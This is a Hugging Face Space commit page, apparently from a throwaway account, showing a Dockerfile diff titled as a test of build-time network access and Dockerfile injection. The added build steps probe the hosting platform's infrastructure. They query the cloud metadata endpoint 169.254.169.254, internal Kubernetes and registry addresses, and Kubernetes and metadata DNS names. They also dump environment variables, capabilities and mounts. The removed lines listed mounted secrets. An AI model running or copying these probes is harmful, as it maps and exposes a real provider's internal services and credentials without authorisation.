Hugging Face's logo

Spaces:
FIRSTACCOUNT69
/
env-test-s19
Sleeping

App Files Community
testtest123 commited on
Commit
394d133
·
1 Parent(s): c37bfd9

Test build-time network access and Dockerfile injection

Browse files
Files changed (1) hide show
  1. Dockerfile +40 -20
Dockerfile CHANGED
@@ -1,25 +1,45 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
  FROM python:3.9-slim
2
 
3
- # Print env during build to see what's available at build time
4
- RUN echo "=== BUILD TIME ENV VARS ===" && env | sort && echo "=== END BUILD ENV ==="
5
-
6
- # Try to read Docker build args
7
- RUN echo "=== DOCKER INFO ===" && cat /proc/self/cgroup 2>/dev/null || true && echo "=== END DOCKER INFO ==="
8
-
9
- # Try to read any mounted secrets
10
- RUN echo "=== CHECKING SECRETS ===" && \
11
- ls -la /run/secrets/ 2>/dev/null || echo "No /run/secrets" && \
12
- ls -la /var/run/secrets/ 2>/dev/null || echo "No /var/run/secrets" && \
13
- echo "=== END SECRETS CHECK ==="
14
-
15
- # Try to read metadata/cloud info during build
16
- RUN echo "=== CHECKING FILESYSTEM ===" && \
17
- ls -la / 2>/dev/null && \
18
- ls -la /workspace 2>/dev/null || echo "No /workspace" && \
19
- ls -la /data 2>/dev/null || echo "No /data" && \
20
- echo "=== END FILESYSTEM ==="
21
-
22
- # Install deps
23
  RUN pip install flask
24
 
25
  COPY app.py /app.py
 
1
+ # Multi-stage build to test build context escape
2
+ FROM python:3.9-slim AS builder
3
+
4
+ # Check what network access we have during build
5
+ RUN apt-get update && apt-get install -y curl dnsutils net-tools 2>/dev/null || true
6
+
7
+ # Test DNS resolution during build
8
+ RUN nslookup kubernetes.default.svc.cluster.local 2>&1 || echo "K8s DNS not available in build"
9
+ RUN nslookup metadata.google.internal 2>&1 || echo "Metadata DNS not available in build"
10
+ RUN nslookup instance-data.ec2.internal 2>&1 || echo "EC2 metadata DNS not available in build"
11
+
12
+ # Test network access during build
13
+ RUN curl -s --connect-timeout 3 http://169.254.169.254/latest/meta-data/ 2>&1 || echo "EC2 metadata not accessible in build"
14
+ RUN curl -s --connect-timeout 3 http://172.20.0.1:443/ 2>&1 || echo "K8s API not accessible in build"
15
+ RUN curl -s --connect-timeout 3 http://10.108.0.2:53/ 2>&1 || echo "DNS server not directly accessible"
16
+
17
+ # Check build system info
18
+ RUN echo "=== BUILD HOST INFO ===" && \
19
+ hostname 2>/dev/null && \
20
+ cat /etc/hostname 2>/dev/null && \
21
+ cat /proc/version 2>/dev/null && \
22
+ echo "=== END HOST INFO ==="
23
+
24
+ # Check build capabilities
25
+ RUN echo "=== BUILD CAPS ===" && \
26
+ cat /proc/self/status | grep -i cap 2>/dev/null && \
27
+ echo "=== END CAPS ==="
28
+
29
+ # Check if build has any special mounts
30
+ RUN echo "=== BUILD MOUNTS ===" && \
31
+ cat /proc/self/mountinfo 2>/dev/null | head -30 && \
32
+ echo "=== END MOUNTS ==="
33
+
34
+ # Check if we can reach the Docker registry used to push images
35
+ RUN curl -s --connect-timeout 3 http://registry.internal:5000/v2/_catalog 2>&1 || echo "No internal registry"
36
+
37
+ # Check what env vars are available in the builder
38
+ RUN env | sort
39
+
40
+ # Final stage
41
  FROM python:3.9-slim
42
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
43
  RUN pip install flask
44
 
45
  COPY app.py /app.py